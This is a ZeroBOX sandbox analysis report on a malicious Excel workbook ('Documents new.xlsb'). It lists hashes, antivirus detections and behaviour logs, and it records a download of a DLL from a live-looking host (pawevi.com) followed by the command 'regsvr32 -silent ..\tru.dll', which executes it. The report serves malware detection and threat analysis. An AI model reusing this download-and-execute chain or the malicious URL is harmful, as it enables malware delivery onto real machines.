Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 10, 2021, 10:27 a.m.	Sept. 10, 2021, 10:29 a.m.

Size	324.3KB
Type	Zip archive data, at least v2.0 to extract
MD5	`e2c5c7d099745fa74d4653b6d49338d2`
SHA256	`8662d511c7f1bef3a6e4f6d72965760345b57ddf0de5d3e6eae4e610216a39c1`
CRC32	`91C09180`
ssdeep	`6144:4R+roOczZ5uoKG6qYR90sX9OYubAp2BAHDwRsX3+HnMtgG5HyQt:jkOczZoHqYR90a9nyE2n+uHnkpHy6`
Yara	xlsb - Excel Binary Workbook file format detection

EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" "C:\Users\test22\AppData\Local\Temp\Documents new.xlsb"
1116
- regsvr32.exe regsvr32 -silent ..\tru.dll
  2664

Name	Response	Post-Analysis Lookup
pawevi.com

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Allocates read-write-execute memory (usually to unpack itself) (14 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 10, 2021, 10:27 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dce1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 10:27 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dd3f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 10:27 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dd3f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 10:27 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dbe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 10:27 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74f41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 10:27 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75241000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 10:27 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75111000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 10:27 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73321000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 10:27 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dae1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 10, 2021, 10:27 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dad1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 10:27 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05150000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 10:27 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05150000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 10:27 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05160000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 10, 2021, 10:27 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05180000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\tru.dll

Creates hidden or system file (3 events)

Time & API	Arguments	Status
NtCreateFile Sept. 10, 2021, 10:27 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x000003a4 filepath: C:\Users\test22\AppData\Local\Temp\~$Documents new.xlsb desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$Documents new.xlsb create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1
NtCreateFile Sept. 10, 2021, 10:27 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x0000042c filepath: C:\Users\test22\AppData\Local\Temp\~$Documents new.xlsb desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$Documents new.xlsb create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1
NtCreateFile Sept. 10, 2021, 10:27 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x00000438 filepath: C:\Users\test22\AppData\Local\Temp\~$Documents new.xlsb desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$Documents new.xlsb create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1

Creates a suspicious process (1 event)

cmdline

regsvr32 -silent ..\tru.dll

Network communications indicative of a potential document or script payload download was initiated by the process excel.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
URLDownloadToFileW Sept. 10, 2021, 10:27 a.m.	url: https://pawevi.com/lch5.dll stack_pivoted: 0 filepath_r: ..\tru.dll filepath: C:\Users\test22\tru.dll		2148270085	0

One or more non-whitelisted processes were created (1 event)

parent_process

excel.exe

martian_process

regsvr32 -silent ..\tru.dll

File has been identified by 23 AntiVirus engines on VirusTotal as malicious (23 events)

FireEye	Trojan.GenericKD.46821851
ALYac	Trojan.Downloader.XLS.gen
Alibaba	TrojanDownloader:VBA/MalDoc.ali1000101
Cyren	XF/SneakyBin.AC.gen!Camelot
Symantec	Trojan.Gen.NPE
ESET-NOD32	a variant of Generik.HYXVNJK
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan-Downloader.MSOffice.SLoad.gen
BitDefender	Trojan.GenericKD.46821851
MicroWorld-eScan	Trojan.GenericKD.46821851
Ad-Aware	Trojan.GenericKD.46821851
Emsisoft	Trojan.GenericKD.46821851 (B)
Ikarus	Trojan.SuspectCRC
Avira	W97M/Dldr.Sload.mhxaz
Kingsoft	Macro.Excel.Downloader.xl.(kcloud)
Microsoft	TrojanDownloader:O97M/EncDoc.SMT!MTB
Gridinsoft	Trojan.U.Downloader.oa
ViRobot	XLS.Z.Agent.332087
GData	Trojan.GenericKD.46821851
AhnLab-V3	Downloader/XLS.Agent
MAX	malware (ai score=87)
Tencent	Trojan.MsOffice.Macro40.11013333
Fortinet	MSExcel/Agent.4214!tr.dldr

Documents new.xlsb

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All